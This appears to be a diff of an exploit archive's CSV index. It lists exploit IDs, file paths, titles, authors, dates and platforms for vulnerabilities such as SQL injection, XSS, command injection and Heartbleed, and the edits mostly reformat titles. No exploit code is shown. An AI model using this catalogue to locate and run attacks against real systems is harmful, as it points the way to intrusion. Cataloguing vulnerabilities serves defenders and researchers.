32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 'search.php' Cross Site Scripting Vulnerability",2008-10-28,cize0f,php,webapps,0 32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0 32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80 -32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0 +32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 'index.php' Cross Site Scripting Vulnerability",2008-10-29,ShockShadow,php,webapps,0 32548,platforms/linux/remote/32548.html,"Opera Web Browser 9.x History Search and Links Panel Cross Site Scripting Vulnerabilities",2008-10-30,"Stefano Di Paola",linux,remote,0 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS 'Default_.aspx' Cross Site Scripting Vulnerability",2008-10-29,Pouya_Server,asp,webapps,0 @@ -29303,10 +29303,10 @@ id,file,description,date,author,platform,type,port 32561,platforms/php/webapps/32561.txt,"LinEx - Password Reset Vulnerability",2014-03-27,"N B Sri Harsha",php,webapps,80 32562,platforms/php/webapps/32562.txt,"Joomla Kunena Component 3.0.4 - Persistent XSS",2014-03-27,Qoppa,php,webapps,80 32563,platforms/php/webapps/32563.txt,"YourFreeWorld Downline Builder Pro 'id' Parameter SQL Injection Vulnerability",2008-11-02,"Hussin X",php,webapps,0 -32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0 -32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 +32564,platforms/multiple/remote/32564.txt,"XWork 2.0.x - 'ParameterInterceptor' Class OGNL Security Bypass Vulnerability",2008-11-04,"Meder Kydyraliev",multiple,remote,0 +32565,platforms/multiple/remote/32565.txt,"Struts <= 2.0.11 - Multiple Directory Traversal Vulnerabilities",2008-11-04,"Csaba Barta",multiple,remote,0 32566,platforms/php/webapps/32566.txt,"firmCHANNEL Indoor & Outdoor Digital Signage 3.24 Cross Site Scripting Vulnerability",2008-11-04,"Brad Antoniewicz",php,webapps,0 -32567,platforms/php/webapps/32567.txt,"DHCart 3.84 Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 +32567,platforms/php/webapps/32567.txt,"DHCart 3.84 - Multiple Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-04,Lostmon,php,webapps,0 32568,platforms/windows/remote/32568.rb,"Fitnesse Wiki - Remote Command Execution Vulnerability",2014-03-28,"SecPod Research",windows,remote,80 32569,platforms/ios/webapps/32569.txt,"iStArtApp FileXChange 6.2 iOS - Multiple Vulnerabilities",2014-03-28,Vulnerability-Lab,ios,webapps,8888 32570,platforms/php/webapps/32570.txt,"CuteNews aj-fork 'path' Parameter Remote File Include Vulnerability",2008-11-06,DeltahackingTEAM,php,webapps,0 @@ -29318,7 +29318,7 @@ id,file,description,date,author,platform,type,port 32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager Cross Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 32577,platforms/asp/webapps/32577.txt,"Dizi Portali 'film.asp' SQL Injection Vulnerability",2008-11-10,"Kaan KAMIS",asp,webapps,0 32578,platforms/windows/remote/32578.py,"Yosemite Backup 8.70 'DtbClsLogin()' Remote Buffer Overflow Vulnerability",2008-11-11,"Abdul-Aziz Hariri",windows,remote,0 -32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 +32579,platforms/jsp/webapps/32579.html,"Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities",2008-11-11,"Richard Brain",jsp,webapps,0 32580,platforms/asp/webapps/32580.txt,"ASP-Nuke 2.0.7 - 'gotourl.asp' Open Redirect Vulnerability",2014-03-29,"felipe andrian",asp,webapps,0 32581,platforms/multiple/dos/32581.txt,"Zope <= 2.11.2 PythonScript Multiple Remote Denial Of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",multiple,dos,0 32582,platforms/hardware/remote/32582.txt,"Belkin F5D8233-4 Wireless N Router Multiple Scripts Authentication Bypass Vulnerabilities",2008-11-12,"Craig Heffner",hardware,remote,0 @@ -29336,14 +29336,14 @@ id,file,description,date,author,platform,type,port 32595,platforms/php/webapps/32595.txt,"Softbiz Classifieds Script Cross Site Scripting Vulnerability",2008-11-20,"Vahid Ezraeil",php,webapps,0 32596,platforms/multiple/dos/32596.txt,"GeSHi 1.0.x XML Parsing Remote Denial Of Service Vulnerability",2008-11-20,"Christian Hoffmann",multiple,dos,0 32597,platforms/php/webapps/32597.txt,"Pilot Group PG Roommate SQL Injection Vulnerability",2008-11-23,ZoRLu,php,webapps,0 -32598,platforms/php/webapps/32598.txt,"COMS 'dynamic.php' Cross Site Scripting Vulnerability",2008-11-24,Pouya_Server,php,webapps,0 +32598,platforms/php/webapps/32598.txt,"COms 'dynamic.php' Cross Site Scripting Vulnerability",2008-11-24,Pouya_Server,php,webapps,0 32599,platforms/hardware/remote/32599.txt,"Linksys WRT160N 'apply.cgi' Cross-Site Scripting Vulnerability",2008-11-27,"David Gil",hardware,remote,0 32600,platforms/php/webapps/32600.txt,"AssoCIateD 1.4.4 'menu' Parameter Cross Site Scripting Vulnerability",2008-11-27,"CWH Underground",php,webapps,0 32601,platforms/asp/webapps/32601.txt,"Ocean12 FAQ Manager Pro 'Keyword' Parameter Cross Site Scripting Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32602,platforms/asp/webapps/32602.txt,"Multiple Ocean12 Products 'Admin_ID' Parameter SQL Injection Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32603,platforms/asp/webapps/32603.txt,"Ocean12 Mailing LisManager Gold 2.04 'Email' Parameter SQL Injection Vulnerability",2008-11-29,"Charalambous Glafkos",asp,webapps,0 32604,platforms/asp/webapps/32604.txt,"ParsBlogger 'blog.asp' Cross Site Scripting Vulnerability",2008-11-29,Pouya_Server,asp,webapps,0 -32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 +32605,platforms/php/webapps/32605.txt,"Venalsur Booking Centre 2.01 - Multiple Cross-Site Scripting Vulnerabilities",2008-11-29,Pouya_Server,php,webapps,0 32606,platforms/php/webapps/32606.txt,"Basic CMS 'q' Parameter Cross Site Scripting Vulnerability",2008-11-29,Pouya_Server,php,webapps,0 32607,platforms/php/webapps/32607.txt,"RakhiSoftware Shopping Cart product.php Multiple Parameter XSS",2008-11-28,"Charalambous Glafkos",php,webapps,0 32608,platforms/php/webapps/32608.txt,"RakhiSoftware Shopping Cart PHPSESSID Cookie Manipulation Path Disclosure",2008-11-28,"Charalambous Glafkos",php,webapps,0 @@ -29394,7 +29394,7 @@ id,file,description,date,author,platform,type,port 32653,platforms/asp/webapps/32653.txt,"dotnetindex Professional Download Assistant 0.1 SQL Injection Vulnerability",2008-12-09,ZoRLu,asp,webapps,0 32654,platforms/windows/remote/32654.txt,"Internet Explorer 8 CSS 'expression' Property Cross Site Scripting Filter Bypass Weakness",2008-12-11,"Rafel Ivgi",windows,remote,0 32655,platforms/jsp/webapps/32655.txt,"Multiple Ad Server Solutions Products 'logon_processing.jsp' SQL Injection Vulnerabilities",2008-12-11,"3d D3v!L",jsp,webapps,0 -32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 +32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection Vulnerabilities",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/remote/32657.py,"Nokia N70 and N73 Malformed OBEX Name Header Remote Denial of Service Vulnerability",2008-12-12,NCNIPC,windows,remote,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary 'cat' Parameter SQL Injection Vulnerability",2008-12-13,Pouya_Server,asp,webapps,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 @@ -29426,14 +29426,14 @@ id,file,description,date,author,platform,type,port 32686,platforms/multiple/remote/32686.xml,"MagpieRSS 0.72 CDATA HTML Injection Vulnerability",2008-12-29,system_meltdown,multiple,remote,0 32687,platforms/asp/webapps/32687.txt,"Madrese-Portal 'haber.asp' SQL Injection Vulnerability",2008-12-29,"Sina Yazdanmehr",asp,webapps,0 32688,platforms/windows/remote/32688.py,"Winace 2.2 Malformed Filename Remote Denial of Service Vulnerability",2008-12-29,cN4phux,windows,remote,0 -32689,platforms/php/webapps/32689.txt,"NPDS Versions Prior to 08.06 Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 +32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution Vulnerability",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow Vulnerability",2008-12-30,"Anton Khirnov",linux,remote,0 -32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/MMS Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/Mms Remote Denial Of Service Vulnerability",2008-12-30,"Tobias Engel",hardware,dos,0 32693,platforms/php/local/32693.php,"suPHP <= 0.7 'suPHP_ConfigPath' Safe Mode Restriction-Bypass Vulnerability",2008-12-31,Mr.SaFa7,php,local,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service Vulnerability (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 -32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 +32696,platforms/linux/dos/32696.txt,"KDE Konqueror 4.1 - Multiple Cross-Site Scripting and Denial of Service Vulnerabilities",2009-01-02,athos,linux,dos,0 32697,platforms/linux/dos/32697.pl,"aMSN '.ctt' File Remote Denial of Service Vulnerability",2009-01-03,Hakxer,linux,dos,0 32698,platforms/php/webapps/32698.txt,"SolucionXpressPro 'main.php' SQL Injection Vulnerability",2009-01-05,Ehsan_Hp200,php,webapps,0 32699,platforms/windows/remote/32699.txt,"Google Chrome 1.0.154.36 - FTP Client PASV Port Scan Information Disclosure Vulnerability",2009-01-05,"Aditya K Sood",windows,remote,0 @@ -29487,9 +29487,9 @@ id,file,description,date,author,platform,type,port 32752,platforms/windows/local/32752.rb,"WinRAR Filename Spoofing",2014-04-08,metasploit,windows,local,0 32753,platforms/hardware/remote/32753.rb,"Fritz!Box Webcm Unauthenticated Command Injection",2014-04-08,metasploit,hardware,remote,0 32754,platforms/osx/dos/32754.c,"MacOS X 10.9 Hard Link Memory Corruption",2014-04-08,"Maksymilian Arciemowicz",osx,dos,0 -32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 +32755,platforms/windows/dos/32755.c,"WFTPD Pro 3.30 - Multiple Command Remote Denial of Service Vulnerabilities",2009-01-26,LiquidWorm,windows,dos,0 32756,platforms/asp/webapps/32756.txt,"LDF 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0 -32757,platforms/php/webapps/32757.txt,"ConPresso CMS Multiple 4.07 Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 +32757,platforms/php/webapps/32757.txt,"ConPresso CMS Multiple 4.07 - Multiple Remote Vulnerabilities",2009-01-26,"David Vieira-Kurz",php,webapps,0 32758,platforms/asp/webapps/32758.txt,"Lootan 'login.asp' SQL Injection Vulnerability",2009-01-26,"Arash Setayeshi",asp,webapps,0 32759,platforms/php/webapps/32759.txt,"OpenX <= 2.6.2 'MAX_type' Parameter Local File Include Vulnerability",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass Vulnerability",2009-01-24,FarhadKey,php,webapps,0 @@ -29499,8 +29499,8 @@ id,file,description,date,author,platform,type,port 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek 'cs.html' URI Redirection Vulnerability",2009-01-28,buzzy,php,webapps,0 -32767,platforms/php/webapps/32767.txt,"QuickCms 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0 -32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch Version: 1.7b 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0 +32767,platforms/php/webapps/32767.txt,"QuickCMS 5.4 - Multiple Vulnerabilites",2014-04-09,"Shpend Kurtishaj",php,webapps,0 +32768,platforms/cgi/webapps/32768.pl,"PerlSoft Gästebuch 1.7b - 'admincenter.cgi' Remote Command Execution Vulnerability",2009-01-29,Perforin,cgi,webapps,0 32769,platforms/php/remote/32769.php,"PHP 5.2.5 'mbstring.func_overload' Webserver Denial Of Service Vulnerability",2009-01-30,strategma,php,remote,0 32770,platforms/php/webapps/32770.txt,"E-Php B2B Trading Marketplace Script Multiple Cross Site Scripting Vulnerabilities",2009-01-30,SaiedHacker,php,webapps,0 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation Vulnerability",2009-02-02,"Ruben Santamarta ",windows,local,0 @@ -29517,7 +29517,7 @@ id,file,description,date,author,platform,type,port 32782,platforms/php/webapps/32782.txt,"FotoWeb 6.0 Login.fwx s Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0 32783,platforms/php/webapps/32783.txt,"FotoWeb 6.0 Grid.fwx search Parameter XSS",2009-02-09,"Stelios Tigkas",php,webapps,0 32784,platforms/php/webapps/32784.txt,"glFusion 1.1 Anonymous Comment 'username' Field HTML Injection Vulnerability",2009-02-05,"Bjarne Mathiesen Schacht",php,webapps,0 -32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 +32785,platforms/php/webapps/32785.txt,"Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities",2009-02-09,aGGreSSor,php,webapps,0 32789,platforms/unix/remote/32789.rb,"Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution",2014-04-10,metasploit,unix,remote,443 32790,platforms/php/webapps/32790.txt,"XCloner Standalone 3.5 - CSRF Vulnerability",2014-04-10,"High-Tech Bridge SA",php,webapps,80 32791,platforms/multiple/remote/32791.c,"Heartbleed OpenSSL - Information Leak Exploit (1)",2014-04-10,prdelka,multiple,remote,443 @@ -29534,14 +29534,14 @@ id,file,description,date,author,platform,type,port 32802,platforms/php/webapps/32802.txt,"ClipBucket 1.7 'dwnld.php' Directory Traversal Vulnerability",2009-02-16,JIKO,php,webapps,0 32803,platforms/php/webapps/32803.txt,"A4Desk Event Calendar 'eventid' Parameter SQL Injection Vulnerability",2008-10-01,r45c4l,php,webapps,0 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 'phpbb_root_path' Parameter Remote File Include Vulnerability",2009-02-20,Kacper,php,webapps,0 -32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0 +32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability",2009-02-20,"Clément Lecigne",linux,local,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia 'index.php' Local File Include Vulnerability",2009-02-22,PLATEN,php,webapps,0 32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 'banddetails.php' SQL Injection Vulnerability",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution Vulnerability",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 -32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 +32813,platforms/osx/local/32813.c,"Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Privilege Escalation Exploit",2014-04-11,"Kenzley Alphonse",osx,local,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection Vulnerability",2014-04-11,delme,php,webapps,0 32815,platforms/linux/local/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,local,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS 'news.php' SQL Injection Vulnerability",2009-02-25,Cru3l.b0y,php,webapps,0 @@ -29550,13 +29550,13 @@ id,file,description,date,author,platform,type,port 32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 'index.php' SQL Injection Vulnerability",2009-02-26,Cru3l.b0y,php,webapps,0 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x PKCS#11 Implementation Unauthorized Access Vulnerability",2009-02-26,"Andreas Jellinghaus",linux,local,0 32821,platforms/java/webapps/32821.html,"APC PowerChute Network Shutdown HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2009-02-26,"Digital Security Research Group",java,webapps,0 -32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 +32823,platforms/php/webapps/32823.txt,"Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities",2009-02-27,Corwin,php,webapps,0 32824,platforms/windows/dos/32824.pl,"Internet Download Manager 5.15 Build 3 Language File Parsing Buffer Overflow Vulnerability",2009-02-27,"musashi karak0rsan",windows,dos,0 32825,platforms/linux/remote/32825.txt,"djbdns 1.05 Long Response Packet Remote Cache Poisoning Vulnerability",2009-02-27,"Matthew Dempsky",linux,remote,0 32826,platforms/windows/remote/32826.html,"iDefense COMRaider Active X Control 'write()' Arbitrary File Overwrite Vulnerability",2009-03-02,"Amir Zangeneh",windows,remote,0 32827,platforms/php/webapps/32827.txt,"Afian 'includer.php' Directory Traversal Vulnerability",2009-03-02,vnbrain.net,php,webapps,0 -32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 -32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0 +32828,platforms/php/webapps/32828.txt,"Yektaweb Academic Web Tools CMS 1.4.2.8/1.5.7 - Multiple Cross Site Scripting Vulnerabilities",2009-03-02,Isfahan,php,webapps,0 +32829,platforms/linux/local/32829.c,"Linux Kernel 2.6.x - 'seccomp' System Call Security Bypass Vulnerability",2009-03-02,"Chris Evans",linux,local,0 32830,platforms/php/webapps/32830.txt,"CubeCart 5.2.8 - Session Fixation",2014-04-13,absane,php,webapps,0 32831,platforms/php/webapps/32831.txt,"Microweber CMS 0.93 - CSRF Vulnerability",2014-04-13,sajith,php,webapps,0 32832,platforms/windows/remote/32832.c,"NovaStor NovaNET 12 'DtbClsLogin()' Remote Stack Buffer Overflow Vulnerability",2009-03-02,"AbdulAziz Hariri",windows,remote,0 @@ -29602,7 +29602,7 @@ id,file,description,date,author,platform,type,port 32873,platforms/php/webapps/32873.txt,"PHPCMS2008 'ask/search_ajax.php' SQL Injection Vulnerability",2009-03-17,anonymous,php,webapps,0 32874,platforms/asp/webapps/32874.txt,"BlogEngine.NET 1.4 'search.aspx' Cross Site Scripting Vulnerability",2009-04-01,sk,asp,webapps,0 32875,platforms/php/webapps/32875.txt,"Comparison Engine Power 1.0 'product.comparision.php' SQL Injection Vulnerability",2009-03-25,SirGod,php,webapps,0 -32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 +32876,platforms/novell/remote/32876.txt,"Novell NetStorage 2.0.1/3.1.5 - Multiple Remote Vulnerabilities",2009-03-26,"Bugs NotHugs",novell,remote,0 32877,platforms/multiple/remote/32877.txt,"Xlight FTP Server <= 3.2 'user' SQL Injection Vulnerability",2009-03-19,fla,multiple,remote,0 32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross Site Scripting Vulnerability",2009-03-31,"Bugs NotHugs",hardware,remote,0 32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 'webdbm' Multiple Cross Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0 @@ -29622,7 +29622,7 @@ id,file,description,date,author,platform,type,port 32893,platforms/windows/local/32893.txt,"Microsoft Windows VISTA/2008 - Thread Pool ACL Local Privilege Escalation Vulnerability",2009-04-14,"Cesar Cerrudo",windows,local,0 32894,platforms/multiple/webapps/32894.txt,"IBM BladeCenter Advanced Management Module 1.42 Login username XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 32895,platforms/multiple/webapps/32895.txt,"IBM BladeCenter Advanced Management Module 1.42 private/file_management.ssi PATH Parameter XSS",2009-04-09,"Henri Lindberg",multiple,webapps,0 -32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 +32896,platforms/multiple/webapps/32896.html,"IBM BladeCenter Advanced Management Module 1.42 - CSRF",2009-04-09,"Henri Lindberg",multiple,webapps,0 32897,platforms/java/webapps/32897.txt,"Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities",2009-04-09,"Usman Saeed",java,webapps,0 32898,platforms/asp/webapps/32898.txt,"XIGLA Absolute Form Processor XE 1.5 'login.asp' SQL Injection Vulnerability",2009-04-09,"ThE g0bL!N",asp,webapps,0 32899,platforms/windows/dos/32899.py,"Jzip SEH Unicode Buffer Overflow (Denial of Service)",2014-04-16,"motaz reda",windows,dos,0 @@ -29643,9 +29643,9 @@ id,file,description,date,author,platform,type,port 32919,platforms/hardware/remote/32919.txt,"SAP Router - Timing Attack Password Disclosure",2014-04-17,"Core Security",hardware,remote,0 32920,platforms/multiple/remote/32920.txt,"Apache Geronimo 2.1.x /console/portal/Server/Monitoring Multiple Parameter XSS",2009-04-16,DSecRG,multiple,remote,0 32921,platforms/multiple/remote/32921.txt,"Apache Geronimo 2.1.x /console/portal/ URI XSS",2009-04-16,DSecRG,multiple,remote,0 -32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x Multiple Admin Function CSRF",2009-04-16,DSecRG,multiple,remote,0 -32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 Remote Buffer Overflow Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 -32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 +32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Multiple Admin Function CSRF",2009-04-16,DSecRG,multiple,remote,0 +32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow Vulnerability",2009-04-16,e.wiZz!,windows,remote,0 +32924,platforms/php/webapps/32924.txt,"razorCMS 0.3RC2 - Multiple Vulnerabilities",2009-04-16,"Jeremi Gosney",php,webapps,0 32925,platforms/multiple/remote/32925.txt,"NRPE <= 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 32926,platforms/linux/dos/32926.c,"Linux group_info refcounter - Overflow Memory Corruption",2014-04-18,"Thomas Pollet",linux,dos,0 32927,platforms/java/webapps/32927.txt,"BlackBerry Enterprise Server 4.0/4.1 MDS Connection Service Cross Site Scripting Vulnerability",2009-04-16,"Ken Millar",java,webapps,0 @@ -29681,13 +29681,13 @@ id,file,description,date,author,platform,type,port 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 Directory Traversal Vulnerability and Arbitrary File Disclosure Vulnerability",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat 'input.php' Multiple Cross Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,metasploit,windows,remote,0 -32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 +32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 'nsTextFrame::ClearTextRun()' Remote Memory Corruption Vulnerability",2009-04-27,"Marc Gueury",linux,dos,0 32962,platforms/cgi/remote/32962.txt,"LevelOne AMG-2000 2.00.00 Security Bypass Vulnerability",2009-04-29,J.Greil,cgi,remote,0 32963,platforms/php/webapps/32963.txt,"Coppermine Photo Gallery <= 1.4.21 'css' Parameter Cross-Site Scripting Vulnerability",2009-04-29,"Gerendi Sandor Attila",php,webapps,0 32964,platforms/linux/dos/32964.c,"GnuTLS 2.6.x libgnutls lib/pk-libgcrypt.c Malformed DSA Key Handling Remote DoS",2009-04-30,"Miroslav Kratochvil",linux,dos,0 32965,platforms/linux/remote/32965.c,"GnuTLS 2.6.x libgnutls lib/gnutls_pk.c DSA Key Storage Remote Spoofing",2009-04-30,"Miroslav Kratochvil",linux,remote,0 -32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0 +32966,platforms/php/webapps/32966.txt,"MyBB 1.4.5 - Multiple Security Vulnerabilities",2009-05-03,"Jacques Copeau",php,webapps,0 32967,platforms/multiple/remote/32967.txt,"Openfire 3.x jabber:iq:auth 'passwd_change' Remote Password Change Vulnerability",2009-05-04,"Daryl Herzmann",multiple,remote,0 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection Vulnerabilities",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 'cleanHTML()' Function Cross-Site Scripting Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 @@ -29706,13 +29706,13 @@ id,file,description,date,author,platform,type,port 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation Vulnerability",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross Site Scripting Vulnerability",2009-05-05,DSecRG,multiple,remote,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 -32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0 +32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0 32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent XSS via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0 32991,platforms/php/webapps/32991.txt,"Claroline 1.8.11 'claroline/linker/notfound.php' Cross-Site Scripting Vulnerability",2009-05-08,"Gerendi 